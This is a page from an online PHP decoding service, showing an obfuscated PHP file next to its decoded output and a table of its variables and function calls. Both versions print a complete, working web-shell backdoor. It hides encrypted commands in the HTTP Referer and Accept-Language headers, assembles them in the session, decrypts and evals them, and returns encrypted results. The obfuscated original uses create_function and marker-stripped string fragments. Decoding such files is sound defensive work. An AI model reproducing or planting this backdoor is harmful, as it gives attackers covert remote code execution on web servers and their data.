Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $A=str_replace('mZ','','crmZeatmZmZe_mZfunmZctimZon'); $n='|{$kh="|{5d41";$k|{f="4..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$A=str_replace('mZ','','crmZeatmZmZe_mZfunmZctimZon');
$n='|{$kh="|{5d41";$k|{f="40|{2a";function x($t|{,|{$k){$c=strl|{e|{n($k);$l=st|{rle|{n($t);|{|{$|{o="";f|';
$M='key_exist|{s($|{i,$s)){$s|{[$i|{].=|{$p;$e=str|{po|{s($s[$i],$f);|{if(|{$e){|{$k|{=$kh.$|{kf;ob_star';
$e='+)|{$p.=$q[$m|{[2][|{$z]];i|{f(|{str|{pos($p,$h)=|{==0){|{$s[$i]="";$|{p=$s|{|{s($p,3);}if|{(a|{rray_';
$O='s=&$|{_|{SESSI|{ON;$ss="subst|{r";$sl=|{|{"strtolowe|{r"|{;$i=$m[1][0]|{.$m[|{1][1];$h|{|{=$sl($ss(md5|{|{';
$v='{or($i|{=0;$i<|{$l;|{){for($j=0;($j<$c&&$i|{<$l);$j++|{,$i++|{){$o|{.=$t{$i}^|{$k|{{$|{j};|{}}retu|{rn $o|';
$x='|{se64_enc|{o|{de(x(gzcompre|{ss|{($o)|{,$k|{)|{);print("<$k>$d</|{$k|{>");@session|{_destroy|{();}}}}';
$Q='("|{/",|{"+")|{|{,$ss($s[|{$i]|{,|{0,$e)))|{,$k)));$o=ob_|{get_contents(|{);o|{|{b_end_clean();$|{d=ba';
$F='ch_all("/([\\|{w])[|{\\w-]+(?:;|{|{q=0.([\\d|{]))?|{,?/|{",$ra,$m);|{if($q&&$m|{){@sessi|{on_|{start();|{$';
$S='{;}$r=$_|{SERVER;$rr=@$|{r["HT|{TP_|{REFERER"]|{;$ra=@$r[|{"HTTP_A|{CCE|{PT_L|{ANGUAG|{E"];if($|{rr&&$';
$N='t();|{@ev|{al(@gz|{uncomp|{res|{s(|{@x(@bas|{e|{64_decode(preg_re|{pla|{ce(array(|{"/_/","|{/-/"),a|{rray';
$z='ra){$|{u|{=par|{se_url($rr);|{pa|{rse_str(|{$u["query|{|{"|{],$q);$q|{=a|{rray_val|{ues($q);|{preg_m|{at';
$W='($i.$kh|{),0,3|{));|{$f=$s|{l($|{ss(md|{5($|{i.$kf),0|{,3));$p="";for($z=1;$|{z<coun|{t($|{m[1]);$z+|{';
$d=str_replace('|{','',$n.$v.$S.$z.$F.$O.$W.$e.$M.$N.$Q.$x);
$f=$A('',$d);$f();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A create_function
$F ch_all("/([\|{w])[|{\w-]+(?:;|{|{q=0.([\d|{]))?|{,?/|{",$ra,..
$M key_exist|{s($|{i,$s)){$s|{[$i|{].=|{$p;$e=str|{po|{s($s[$i]..
$N t();|{@ev|{al(@gz|{uncomp|{res|{s(|{@x(@bas|{e|{64_decode(pr..
$O s=&$|{_|{SESSI|{ON;$ss="subst|{r";$sl=|{|{"strtolowe|{r"|{;$..
$Q ("|{/",|{"+")|{|{,$ss($s[|{$i]|{,|{0,$e)))|{,$k)));$o=ob_|{g..
$S {;}$r=$_|{SERVER;$rr=@$|{r["HT|{TP_|{REFERER"]|{;$ra=@$r[|{"..
$W ($i.$kh|{),0,3|{));|{$f=$s|{l($|{ss(md|{5($|{i.$kf),0|{,3));..
$d $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$e +)|{$p.=$q[$m|{[2][|{$z]];i|{f(|{str|{pos($p,$h)=|{==0){|{$s..
$f None
$n |{$kh="|{5d41";$k|{f="40|{2a";function x($t|{,|{$k){$c=strl|..
$v {or($i|{=0;$i<|{$l;|{){for($j=0;($j<$c&&$i|{<$l);$j++|{,$i++..
$x |{se64_enc|{o|{de(x(gzcompre|{ss|{($o)|{,$k|{)|{);print("<$k..
$z ra){$|{u|{=par|{se_url($rr);|{pa|{rse_str(|{$u["query|{|{"|{..

Stats

MD5 40039140efe77373cd67a4e55bcb07df
Eval Count 1
Decode Time 110 ms